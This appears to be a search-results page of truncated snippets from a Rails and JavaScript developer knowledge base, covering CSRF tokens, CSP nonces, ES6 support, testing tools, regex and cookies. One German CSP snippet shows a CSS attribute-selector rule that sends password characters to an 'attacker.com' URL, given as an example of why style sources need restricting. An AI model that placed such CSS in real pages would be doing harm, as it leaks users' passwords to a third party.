...Add <%= csrf_meta_tag %> into your layout's head Put this into a JavaScript file that is always loaded (like your application.js -- or another file you add to the javascript...
Add <%= csrf_meta_tag %> into your layout's head Put this into a JavaScript file that is always loaded (like your application.js -- or another file you add to the...
...example is storing a transition duration as CSS custom property to read it from Javascript. By converting the value like this, you can ensure your Javascript will always get milliseconds...
(@foo or @bar) So you need to replace a hook like this: AfterStep('~@javascript') do ... end With this: AfterStep('not @javascript') do ... end Also grep your entire project for...
DirectUpload allows you to upload files to your file storage without having to wait for the form to submit. It...
...test runner supports mocking a module's dependencies. This has some drawbacks for frontend JavaScript that targets the browser: Jest only runs in Node.js. This means your specs can no...
...contributions to the gem dist/ usually contains files rendered ready for "distribution", e.g. minified Javascript files src/ usually contains the raw "source" files, e.g. split up into many files, before...
...a same_site option, i.e. cookies[:my_cookie] = { value: 'my-value', same_site: 'None' } Javascript (using js-cookie) Make sure you're using at least 2.2.0. Set a cookie with...
...you can use most ES6 features without a build step. Just deliver your plain JavaScript without transpilation through Babel or TypeScript, and modern browsers will run them natively. Features supported...
...Rails with the assets pipeline (sprockets) you are probably using Uglifier to minify your JavaScript. Uglifier can minify some, but not all ES6 language features. Check if you're affected...
not matched Info As of 2024, possessive quantifiers are not supported in JavaScript. There's a TC 39 proposal that's stuck in stage...
...assets that we don't need allow_any_instance_of(ActionView::Base).to receive(:javascript_include_tag).and_return('script') allow_any_instance_of(ActionView::Base).to receive(:stylesheet_link...
...will have two CSRF tokens: A in the . This is required so client-side JavaScripts may make POST, PATCH, DELETE requests. An within each form. Since Rails 5 this token...
...lambda do |request| (request.session.id || SecureRandom.base64(16)).to_s end Then, find all occurences of javascript_include_tag, javascript_tag, javascript_pack_tag etc. and add nonce: true. Also, make sure...
...don't have any other inline scripts in your application that do not use javascript_tag. Why this works The main point of this CSP is to disallow user content...
...prompt will have been closed already and can not be brought back. Also, any JavaScript code placed after the alert will be executed. Automatically closing user prompts happens when performing...
...missing an href attribute. This will probably happen to you every now and then on JavaScript-heavy applications. An example would be an AngularJS application where the following HTML actually...
...link placeholders. So Capybara at least adheres to the HTML spec. :) See also Triggering JavaScript when an element is clicked Capybara can find links and fields by their [aria-label...
...RegExp to interpret text as Shift JIS encoded which you probably don't want. Javascript There is no modifier to make the dot match line feeds. You need to write...
...proposal that's stuck in Stage 1. While there is a /m modifier in Javascript, it only changes the meaning of ^ and $. Perl You can make the dot match line...
...aber die wichtigsten sind: Quellen: default-src: Fallback für alles weitere *-src script-src: JavaScript style-src: CSS font-src: Fonts img-src: Bilder object-src: Quellen für Plugins (z.B...
input[type="password"][value$="a"] { background-image: url("http://attacker.com/passwords-ends-with/a"); } Problem: Manche Javascript-Libraries (Editoren etc) verwenden Inline-Styles. object-src Auch wichtig. Wenn nicht eingeschränkt, können...
...redirect with GET as expected. This is also what Unpoly or the Rails unobtrusive Javascript adapter does when you annotate a link with data-method="PATCH...
...using a tool like Unpoly you might want to set autocomplete="off" in the JavaScript that also initializes your date picker library: up.compiler('.date-picker', function(input) { input.setAttribute('autocomplete', 'off...
}) This way users with JavaScript disabled (and hence no calendar popups) will still get the browser's default autocomplete behavior...
...your footprint small. Check your JS bundles Webpack(er): Analyze the size of your JavaScript components
...event on window. It will be emitted for all uncaught errors in the current JavaScript VM: window.addEventListener('error', function(event) { console.log("Got an uncaught error: ", event.error) }) Tip Testing tools like...
...concept, like a Ruby class attribute (snake_case) that is also exposed to the JavaScript world (camelCase). # This query matches "foobar", "foo-bar" and "foo_bar" # The query is case...
When using the asset pipeline your assets (images, javascripts, stylesheets, fonts) live in folders inside app: app/assets/fonts app/assets/images app/assets/javascripts app/assets/stylesheets With the asset pipeline, you can use the...
...power of Ruby to generate assets. E.g. you can have ERB tags in your Javascript. Or you can have an ERB template which generates Haml which generates HTML. You can...
Jasmine is a great way to unit test your JavaScript components without writing an expensive end-to-end test for every small requirement. After we integrated Jasmine into a Rails...
...attribute will become standard soon. Feel free to use to feel future-proof. On JavaScript file objects, webkitRelativePath is supported similarly to webkitdirectory in HTML. As a fallback for older...
...E.g. console.log("Current string:", string, "Current number:", 12) Your output can have hyperlinks to Javascript objects E.g. console.log("Check out the current %o, it's great", location) Displaying tabular data...